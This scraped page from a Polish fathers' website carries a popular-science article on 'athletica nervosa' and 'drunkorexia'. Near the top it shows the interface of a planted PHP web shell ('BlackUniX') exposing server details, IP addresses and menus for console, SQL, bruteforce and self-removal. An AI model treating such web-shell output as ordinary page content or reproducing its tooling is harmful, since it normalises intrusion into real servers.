W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 06:59:17
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.85.115
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

athletica nervosa
20.06.2008.
Wśród młodych mężczyzn zaczyna się ostatnio panoszyć nowe zaburzenie: athletica nervosa, czyli obsesja na punkcie ćwiczeń. Eksperci uważają, że napędzają ją magazyny dla panów. Choć o istnieniu tego fenomenu wiadomo już od jakiegoś czasu, dopiero teraz psycholodzy zaczęli je badać. Zauważyliśmy, że im więcej dany mężczyzna czyta takich magazynów, tym bardziej staje się zaniepokojony swoją fizycznością – opowiada szef zespołu naukowców, David Giles z Winchester University. Giles i Jessica Close przeprowadzili wywiady ze 161 mężczyznami w wieku od 18 do 36 lat. Pytali, ile magazynów czytają i od jak dawna, a także oceniali ich nawyki żywieniowe, stosunek do wyglądu oraz ilość ćwiczeń.

Mężczyźni, którzy czytali najwięcej gazet dla panów, wydawali się internalizować [uwewnętrzniać] portretowane przez nie ideały wyglądu. Modele z tych wydawnictw wyglądają oszałamiająco dobrze, co może u czytelników wywoływać niepokój dotyczący własnego ciała.

Czytanie takich tytułów wpływa na każdego mężczyznę, jednak oddziałuje silniej na singli niż na panów pozostających w związkach. Wg Gilesa, powody mogą być dwojakie: 1) "sparowani" mężczyźni stają się mniej lękowi lub 2) mają mniej czasu, by systematycznie biegać, chodzić na siłownię itp.

Psycholodzy twierdzą, że mimo zapewnień i własnych przekonań, nikt z nas nie jest odporny na przekazywany przez media obraz idealnego mężczyzny/idealnej kobiety.

Dwa lata temu Kristen Harrison i Bradley Bond z University of Illinois przeprowadzili inne badania, które wykazały, że czasopisma o grach komputerowych powodują, że już 8-letni chłopcy zaczynają pracować nad swoją muskulaturą.

Niedawno naukowcy z Uniwersytetu Florydzkiego stwierdzili, że przekonania młodych mężczyzn dotyczące idealnego wyglądu zmieniły się w ciągu ostatnich 20 lat. Nie powinno to dziwić, bo podobne zjawisko zaszło także w przypadku kobiecej figury. Mężczyzna, który chce sobie znaleźć atrakcyjną partnerkę, powinien być teraz bardziej muskularny.

Dorastający mężczyźni coraz częściej są niezadowoleni ze swojego ciała, co wpędza ich w zaburzenia odżywiania, zachęca do stosowania anabolików i nieprzetestowanych suplementów diety. Wszystko po to, żeby kontrolować wagę i wzrost masy mięśniowej. Takie zachowanie może mieć długoterminowy negatywny wpływ na zdrowie – opowiada Magdala Peixoto Labre.

Mężczyźni zapadają na athletica nervosa, a wśród dążących do upragnionego rozmiaru zero kobiet z USA i Wielkiej Brytanii upowszechnia się tzw. alkoholoreksja (od ang. drunkorexia). Aby przyjmować jakiekolwiek kalorie, dziewczyny zastępują posiłki, np. lunch, lampką białego wina lub innego napoju z procentami.

Może się to wydać dziwne, ponieważ alkohol zawiera dużo pustych kalorii, ale zaburzenie przyjmuje taką, a nie inną postać ze względu na dwie współwystępujące presje kulturowe: przymus pozostania szczupłą i nacisk na picie w towarzystwie. Nie chcesz przytyć, a powinnaś wypić jakiegoś drinka? Zastąp nim kolację. Eksperci alarmują, że grozi to wzrostem liczby uzależnionych od alkoholu kobiet, nie wspominając już o niebezpieczeństwach zdrowotnych związanych z takim zachowaniem. Na pewno ma ono więcej wspólnego z bulimią niż anoreksją.


Autor: Anna Błońska kopalniawiedzy.pl
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.